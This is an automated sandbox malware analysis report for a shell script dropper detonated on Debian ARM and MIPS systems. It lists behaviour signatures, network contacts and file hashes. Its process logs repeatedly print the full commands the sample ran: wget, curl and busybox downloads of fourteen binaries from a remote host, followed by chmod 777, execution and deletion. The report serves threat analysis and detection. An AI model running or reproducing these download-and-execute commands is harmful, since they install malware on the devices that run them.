Malware Analysis Report

2025-05-28 20:51

Sample ID 241021-b1ztasterq
Target aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh
SHA256 aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b
Tags
antivm discovery defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b

Threat Level: Shows suspicious behavior

The file aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm discovery defense_evasion

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-21 01:37

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-21 01:37

Reported

2024-10-21 01:40

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

29s

Command Line

[/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh

[/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-21 01:37

Reported

2024-10-21 01:40

Platform

debian9-mipsbe-20240729-en

Max time kernel

95s

Max time network

98s

Command Line

[/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE N/A
N/A /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ N/A
N/A /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K N/A
N/A /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 N/A
N/A /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce N/A
N/A /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl N/A
N/A /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ N/A
N/A /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 N/A
N/A /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa N/A
N/A /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI N/A
N/A /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 N/A
N/A /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr N/A
N/A /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs N/A
N/A /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /usr/bin/curl N/A
File opened for modification /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /usr/bin/curl N/A
File opened for modification /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /usr/bin/curl N/A
File opened for modification /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /usr/bin/curl N/A
File opened for modification /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /usr/bin/curl N/A
File opened for modification /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /usr/bin/curl N/A
File opened for modification /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /usr/bin/curl N/A
File opened for modification /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /usr/bin/curl N/A
File opened for modification /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /usr/bin/curl N/A
File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /usr/bin/curl N/A
File opened for modification /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /usr/bin/curl N/A
File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /usr/bin/curl N/A
File opened for modification /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /usr/bin/curl N/A
File opened for modification /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /usr/bin/curl N/A

Processes

/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh

[/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/chmod

[chmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE

[./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/rm

[rm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/chmod

[chmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ

[./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/rm

[rm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/chmod

[chmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K

[./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/rm

[rm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/chmod

[chmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8

[./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/rm

[rm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/chmod

[chmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce

[./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/rm

[rm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/chmod

[chmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl

[./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/rm

[rm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/chmod

[chmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ

[./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/rm

[rm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/chmod

[chmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2

[./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/rm

[rm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/chmod

[chmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa

[./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/rm

[rm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/chmod

[chmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI

[./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/rm

[rm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/chmod

[chmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0

[./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/rm

[rm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/chmod

[chmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr

[./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/rm

[rm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/chmod

[chmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs

[./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/rm

[rm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/chmod

[chmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2

[./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/rm

[rm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]


Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
DE 87.120.84.230:80 conn.masjesu.zip tcp

Files

/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa

MD5 e1732e70f015e99d14dff1eeeaec9966
SHA1 c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-21 01:37

Reported

2024-10-21 01:40

Platform

debian9-mipsel-20240226-en

Max time kernel

147s

Max time network

153s

Command Line

[/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE N/A
N/A /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ N/A
N/A /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K N/A
N/A /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 N/A
N/A /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce N/A
N/A /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl N/A
N/A /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ N/A
N/A /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 N/A
N/A /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa N/A
N/A /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI N/A
N/A /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 N/A
N/A /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr N/A
N/A /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs N/A
N/A /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /usr/bin/curl N/A
File opened for modification /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /usr/bin/curl N/A
File opened for modification /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /usr/bin/curl N/A
File opened for modification /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /usr/bin/curl N/A
File opened for modification /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /usr/bin/curl N/A
File opened for modification /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /usr/bin/curl N/A
File opened for modification /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /usr/bin/curl N/A
File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /usr/bin/curl N/A
File opened for modification /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /usr/bin/curl N/A
File opened for modification /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /usr/bin/curl N/A
File opened for modification /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /usr/bin/curl N/A
File opened for modification /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /usr/bin/curl N/A
File opened for modification /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /usr/bin/curl N/A
File opened for modification /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /usr/bin/curl N/A

Processes

/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh

[/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/chmod

[chmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE

[./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/rm

[rm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/chmod

[chmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ

[./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/rm

[rm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/chmod

[chmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K

[./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/rm

[rm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/chmod

[chmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8

[./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/rm

[rm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/chmod

[chmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce

[./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/rm

[rm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/chmod

[chmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl

[./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/rm

[rm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/chmod

[chmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ

[./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/rm

[rm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/chmod

[chmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2

[./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/rm

[rm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/chmod

[chmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa

